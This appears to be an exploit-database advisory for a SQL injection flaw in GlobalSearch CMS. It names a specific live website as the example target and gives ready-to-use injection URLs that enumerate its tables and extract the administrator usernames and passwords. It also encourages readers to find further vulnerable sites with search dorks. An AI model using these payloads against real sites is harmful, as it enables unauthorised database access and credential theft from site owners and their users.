Global Search CMS Sql Injection Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Global Search CMS Sql Injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>[+] Exploit Title : GlobalSearch CMS Sql Injection Vulnerability [+] Exploit Author : N_H [+] Date : 2016/08/13 [+] Tested on : MacOS , Windows , Ubuntu [+] Google Dork : None [+] Home Page : http://www.globalsearch.com.hk [+] Category : Web Application [+] Discovered by : N_H [+] Description : One Sql Injection Vulnerability Discovered on GlobalSearch CMS Websites by N_H. This vulnerability include all of websites of this United Kingdom CMS. Now thousands of websites in the world are on this content management system (CMS). [+] For example, one of the sites vulnerable to this bug we investigated ... -------------------------------------------------------------------------------------------------- Target : http://www.innogreen.com.hk Vulnerable Location : http://www.innogreen.com.hk/system.php?id=20 Columns Number : http://www.innogreen.com.hk/system.php?id=20+order+by+2-- Tables of website : http://www.innogreen.com.hk/system.php?id=20+union+select+group_concat%28table_name%29,2+from+information_schema.tables+where+table_schema=database%28%29-- User and Password of Administrator : http://www.innogreen.com.hk/system.php?id=20+union+select+group_concat%28user,0x3a,password%29,2+from+mcy_admin-- -------------------------------------------------------------------------------------------------- [+] Warning : You can finding more vulnerable websites of this CMS with your creative Google Dorks and other ways. In this exploit we injected one vulnerable website for example. </BODY></HTML>